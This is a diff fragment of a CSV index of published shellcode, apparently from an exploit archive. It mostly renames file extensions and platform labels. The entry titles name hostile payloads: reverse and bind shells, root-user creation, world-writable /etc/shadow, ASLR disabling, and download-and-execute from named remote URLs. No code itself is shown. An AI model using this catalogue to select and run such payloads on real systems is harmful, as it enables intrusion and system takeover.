Shellcode",2009-12-19,mr_me,shellcode,linux_x86 13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86 13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86 @@ -304,16 +304,16 @@ id,file,description,date,author,type,platform 13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86 13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86 13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86 -13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86 +13578,shellcodes/linux_x86/13578.asm,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86 13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86 13581,shellcodes/windows/13581.txt,"Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows -13582,shellcodes/windows/13582.txt,"Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows -13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86 +13582,shellcodes/windows/13582.txt,"Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows +13586,shellcodes/linux_x86/13586.asm,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86 13595,shellcodes/windows_x86/13595.c,"Windows/x86 (XP SP2) (French) - calc.exe Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86 -13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 -13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 -13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 -13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13599,shellcodes/linux_x86/13599.c,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13600,shellcodes/linux_x86/13600.c,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13601,shellcodes/linux_x86/13601.c,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13602,shellcodes/linux_x86/13602.c,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86 13614,shellcodes/windows_x86/13614.c,"Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86 13615,shellcodes/windows_x86/13615.c,"Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86 @@ -322,14 +322,14 @@ id,file,description,date,author,type,platform 13630,shellcodes/windows_x86/13630.c,"Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86 13631,shellcodes/windows_x86/13631.c,"Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86 13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,linux_x86 -13635,shellcodes/windows_x86/13635.txt,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86 +13635,shellcodes/windows_x86/13635.as,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86 13636,shellcodes/windows_x86/13636.c,"Windows/x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86 13639,shellcodes/windows_x86/13639.c,"Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86 -13642,shellcodes/windows_x86/13642.txt,"Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86 +13642,shellcodes/windows_x86/13642.asm,"Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86 13645,shellcodes/windows/13645.c,"Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows 13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86 -13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86 -13649,shellcodes/windows/13649.txt,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows +13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Generator) (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86 +13649,shellcodes/windows/13649.as,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows 13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86 13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 @@ -342,14 +342,14 @@ id,file,description,date,author,type,platform 13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86 -13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 -13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 +13688,shellcodes/linux_x86-64/13688.c,"Linux/x64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 +13691,shellcodes/linux_x86-64/13691.c,"Linux/x64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86 13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86 13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86 13699,shellcodes/windows_x86/13699.txt,"Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86 13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86 -13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 +13703,shellcodes/linux_x86/13703.c,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86 13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86 13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86 @@ -357,14 +357,14 @@ id,file,description,date,author,type,platform 13712,shellcodes/linux_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,linux_x86 13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86 13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86 -13719,shellcodes/windows_x86-64/13719.txt,"Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64 +13719,shellcodes/windows_x86-64/13719.c,"Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64 13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86 13723,shellcodes/linux_x86/13723.c,"Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 -13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 -13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 +13725,shellcodes/linux_x86/13725.c,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 +13726,shellcodes/linux_x86/13726.c,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86 -13729,shellcodes/windows_x86-64/13729.txt,"Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64 +13729,shellcodes/windows_x86-64/13729.c,"Windows/x64 (7) - cmd.exe Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64 13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86 13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86 13732,shellcodes/linux_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86 @@ -372,19 +372,19 @@ id,file,description,date,author,type,platform 13742,shellcodes/linux_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86 13743,shellcodes/linux_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86 14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86 -13828,shellcodes/windows/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows +13828,shellcodes/windows/13828.c,"Windows - MessageBoxA() Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows 13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86 -13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 +13908,shellcodes/linux_x86-64/13908.c,"Linux/x64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86 -13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 -13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64 -14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator -14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm -14052,shellcodes/windows/14052.c,"Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows +13915,shellcodes/linux_x86-64/13915.c,"Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 +13943,shellcodes/linux_x86-64/13943.c,"Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64 +14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator +14116,shellcodes/arm/14116.c,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm +14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows 14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm 14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86 14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm -14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm +14122,shellcodes/arm/14122.c,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm 14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm 14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm 14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86 @@ -396,10 +396,10 @@ id,file,description,date,author,type,platform 14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator 14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86 14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86 -14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64 +14305,shellcodes/linux_x86-64/14305.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64 14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86 14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86 -14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows +14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows 14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86 14873,shellcodes/windows_x86/14873.asm,"Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-01,dijital1,shellcode,windows_x86 14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm @@ -413,34 +413,34 @@ id,file,description,date,author,type,platform 15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm -15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx -15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator +15618,shellcodes/osx/15618.c,"OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx +15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit)",2010-12-09,"Jonathan Salwan",shellcode,generator 15879,shellcodes/windows_x86/15879.txt,"Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator 16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86 -16283,shellcodes/windows_x86/16283.txt,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86 +16283,shellcodes/windows_x86/16283.asm,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86 17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4 -17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86 -17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx +17194,shellcodes/linux_x86/17194.c,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86 +17224,shellcodes/osx/17224.s,"OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx 17323,shellcodes/windows/17323.c,"Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86 17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86 17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4 -17545,shellcodes/windows_x86/17545.txt,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86 +17545,shellcodes/windows_x86/17545.c,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86 17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86 -17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx +17564,shellcodes/osx/17564.asm,"OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx 17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips 17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator 18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4 18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips 18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips -18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64 +18197,shellcodes/linux_x86-64/18197.c,"Linux/x64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64 18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips 18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips 18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86 -18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64 +18585,shellcodes/linux_x86-64/18585.s,"Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64 18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86 20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86 21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm @@ -448,9 +448,9 @@ id,file,description,date,author,type,platform 21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm 40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86 22489,shellcodes/windows/22489.cpp,"Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows -40890,shellcodes/windows_x86-64/40890.c,"Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +40890,shellcodes/windows_x86-64/40890.c,"Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86 -24318,shellcodes/windows/24318.c,"Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows 